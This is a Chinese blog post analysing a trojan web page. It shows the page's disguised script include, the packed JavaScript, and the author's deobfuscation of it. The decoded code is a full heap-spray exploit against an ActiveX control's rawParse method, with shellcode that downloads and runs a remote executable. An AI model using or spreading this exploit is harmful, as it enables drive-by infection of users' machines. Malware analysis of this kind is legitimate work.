always there for you

     昨天分析了06014.html文件([06014.html木马分析]),今天决定把手术刀放在了bfyy.htm这个文件,用文本形式打开后,就出现了:

<script src=bfyy.gif></script>

    这个图片估计是个伪装上的js文件,这利用的是src只要连接的是有实质内容的js文件就行,不限后缀!.

   下载下来后用UE打开.果然不出所料!.放在UE里全选-自动换行,出现以下代码!

eval
(
function(p,a,c,k,e,d)
{
     e=function(c)
{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String))
    {
           while(c--)
           {
               d[e(c)]=k[c]||e(c)
           }
           k=
           [
              function(e)
              {
                  return d[e]
              }
           ];
           e=function()
           {
                 return'\\w+'
           };
           c=1
    };
while(c--)
{
      if(k[c])
      {
          p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 e="1B:1A";2 h="1z-1x-1y";2 g="f-1C-1D";c=1H["1G"]("1F");2 j=e+h+g;c["1E"]("1w",j);2 b=t("%s"+"q"+"%s"+"q"+"%1v%8%1o%1n%1m"+"30%8%1k%1l%1p%u"+"1q%1u%m%1t%1s"+"%1r%1I%1J%21%1Z"+"1Y%1X%22%23%27%u"+"26%25%24%1W%1j"+"%1V%1O%1N%o%1M"+"1K%1L%1P%1Q%C%u"+"1U%1T%1S%1R%28"+"%17%C%H%G%K"+"L%M%P%O%N%u"+"Q%k%R%U%S"+"%V%8%J%E%D"+"F%r%I%m%T%u"+"1i%1c%8%k%1b"+"%1a%19%1d%1e%1h"+"1g%1f%18%W%10%u"+"Z%z%v%Y%X"+"%11%v%12%z%16"+"15%14%13%o%2q%u"+"3i%3h%3g%3e%l"+"%3f%3j%3k%3o%3n"+"29%3m%3l%3d%r%u"+"3c%35%34%33%31"+"%32%36%37%3b%3a"+"39%3q%3p%3v%3N%u"+"3K%3J%3I%3H%3F"+"%3M%3O%3L%3G%3D"+"3E%3u%3t%3r%3s%u"+"3w%3x%3C%3B%3A"+"%p%a%3y%3z%38"+"2Y%2r%2Z%2p%2n%u"+"2o%n%2s%2t%2x"+"%2w%2v%p%a%2u"+"2m%2l%2e%2d%2c%u"+"2a%2b%2f%n%2g"+"%2k%2j%a%2i%2h%2y%2z%2R%2Q%2P%2N%2O%2S%2T%2X%2W%2V%2U%2M%2L%2E%2D%2C%2A%l");2 4=t("%B"+"%B");2 9;9=20;2 6;6=9+b["7"];d(4["7"]<6)4+=4;y=4.A(0,6);5=4.A(0,4.7-6);d(5.7+6<2B)5=5+5+y;x=2F 2G();w=x;2K(i=0;i<2J;i++)w[i]=5+b;2 3=\'\';d(3["7"]<2I)3+="\\1\\1\\1\\1";3+="\\1";3+="\\1";3+="\\1";3+="\\1\\1\\1\\1";3+="\\1\\1\\1\\1";c["2H"](3);',62,237,'|x0a|var|chilam|bigblock|block|shabiqqoday2|length|u0000|shabiqqoday|u0041|shabiqq_code|ying_yings|while|shabiqqid||shabiqqidss|shabiqqids||shabiqqidx|uc683|u0065|ud88b|u6461|u04c7|u7972|90|u57ff|u90|unescape||u4343|qq12345678|shabiqqsss|fillblock|u4320|substring|u9090|u468b|u56|u0dc6|52|uc1c3|u031c|u5afc|u8300|u02|e1|uc103|ufa8b|uc303|u008b|f78b|u8b0e|u5904|u016a|u6ad0|u6ae8|uc7dc|u03c7|u6643|646d|u6303|u632f|u03c6|uec57|uff53|6a|u20|u088b|u8b40|u803e|u8046|u5613|u0057|ufa75|u3680|uec83|80|u5e|e859|uf359|u408b|u8b0c|u00|ua164|u5a00|u1c70|8bad|u1e74|u8b3c|u738b|u0840|uefe9|classid|E586|474|52E1D|6BE|clsid|A6E2|1A85A9B4D9FB|setAttribute|object|createElement|document|u0378|u8bf3|45|u59e9|ue2|u835f|u5908|u5e5f|ucd8b|u33c1|u03e1|ud1c3|0324|u74a6|u0e6a|u4e8b|03|ufb||u207e|u3314|u56ed|uf28b|ufb03|3f8b|u5157|u66c9|ff|6f44|u6e77|u4c52|u5500|u6e6f|u6f6c|u6f54|u7074|u7468|u656c|u6946|u6d6c|75|u6854|6572|u7469|u5c03|u0063|u4c00|u616f|u72|u6172|u6269|u4c64|u2f3a|u772f|u7865|0x40000|u2e73|u7372|u7363|new|Array|rawParse|4057|300|for|u2f63|u6970|u6e75|u632e|u7374|u312e|u7777|u2f6e|u6964|u5f78|u6564|u6e69|u2f72|78|u7845||u33d0|uacc0|uff58|u0040|u2451|uc085|uf975|u65|56|u53|u5251|68f0|u5300|u7804|u3300|u0344|uc765|2e61|u50c0|u5350|u6adc|u8bfc|u57|u5056|u595a|ud2ff|u5374|u7379|u6547|u0073|ue2ab|6574|u446d|u6957|u456e|u6f74|u6365|u7269|u73|65|u7465|u7264|u47ff|uffff|u0ce8|c3c0|u6441|u7250|u33ee|u636f'.split('|'),0,{}))
 

       function(p,a,c,k,e,d)这个函数,我隐约的记得是个加密函数!.上网一搜果然是个加密的js文件!.又要解密,哎.不懂啊!.

      看到了第一个字符为Eval后,我想到了办法!.
      把eval函数变为"document.write",前后加上script标记,另存为html格式文件,运行后得出以下结果!.

var shabiqqid="clsid:6BE";
var shabiqqids="52E1D-E586-474";
var shabiqqidss="f-A6E2-1A85A9B4D9FB";
//ying_yings=document["createElement"]("object");
var shabiqqidx=shabiqqid+shabiqqids+shabiqqidss;
//ying_yings["setAttribute"]("classid",shabiqqidx);

var shabiqq_code=unescape("%u90"+"90"+"%u90"+"90"+"%uefe9%u0000%u5a00%ua164%u00"+"30%u0000%u408b%u8b0c%u1c70%u"+"8bad%u0840%ud88b%u738b%u8b3c"+"%u1e74%u0378%u8bf3%u207e%ufb"+"03%u4e8b%u3314%u56ed%u5157%u"+"3f8b%ufb03%uf28b%u0e6a%uf359"+"%u74a6%u5908%u835f%u04c7%ue2"+"45%u59e9%u5e5f%ucd8b%u468b%u"+"0324%ud1c3%u03e1%u33c1%u66c9"+"%u088b%u468b%u031c%uc1c3%u02"+"e1%uc103%u008b%uc303%ufa8b%u"+"f78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u56"+"52%u57ff%u5afc%ud88b%u016a%u"+"e859%u0057%u0000%uc683%u5613"+"%u8046%u803e%ufa75%u3680%u5e"+"80%uec83%u8b40%uc7dc%u6303%u"+"646d%u4320%u4343%u6643%u03c7"+"%u632f%u4343%u03c6%u4320%u20"+"6a%uff53%uec57%u04c7%u5c03%u"+"2e61%uc765%u0344%u7804%u0065"+"%u3300%u50c0%u5350%u5056%u57"+"ff%u8bfc%u6adc%u5300%u57ff%u"+"68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u53"+"56%ud2ff%u595a%ue2ab%u33ee%u"+"c3c0%u0ce8%uffff%u47ff%u7465"+"%u7250%u636f%u6441%u7264%u73"+"65%u0073%u6547%u5374%u7379%u"+"6574%u446d%u7269%u6365%u6f74"+"%u7972%u0041%u6957%u456e%u65"+"78%u0063%u7845%u7469%u6854%u"+"6572%u6461%u4c00%u616f%u4c64"+"%u6269%u6172%u7972%u0041%u72"+"75%u6d6c%u6e6f%u5500%u4c52%u"+"6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u772f%u7777%u312e%u7374%u6e75%u632e%u2f6e%u6964%u2f72%u6e69%u6564%u5f78%u6970%u2f63%u7363%u7372%u2e73%u7865%u0065");

var bigblock=unescape("%u9090"+"%u9090");

var shabiqqoday;
shabiqqoday=20;
var shabiqqoday2;
shabiqqoday2=shabiqqoday+shabiqq_code["length"];   //为215

while(bigblock["length"]<shabiqqoday2)             //bigblock["length"]为2,条件成立
bigblock+=bigblock;

fillblock=bigblock.substring(0,shabiqqoday2);

block=bigblock.substring(0,bigblock.length-shabiqqoday2);

while(block.length+shabiqqoday2<0x40000)       //block.length为2,则相加的和为217,条件成立
block=block+block+fillblock;

shabiqqsss=new Array();
qq12345678=shabiqqsss;
for(i=0;i<300;i++)
qq12345678[i]=block+shabiqq_code;

var chilam='';
while(chilam["length"]<4057)
     chilam+="\x0a\x0a\x0a\x0a";
     chilam+="\x0a";
     chilam+="\x0a";
     chilam+="\x0a";
     chilam+="\x0a\x0a\x0a\x0a";
     chilam+="\x0a\x0a\x0a\x0a";
    
ying_yings["rawParse"](chilam);

      把shabiqq_code用shellcode解密为:

     还是那个木马!.总算弄出来了,只是最后一个具体的意思没明白!有机会再来看下!.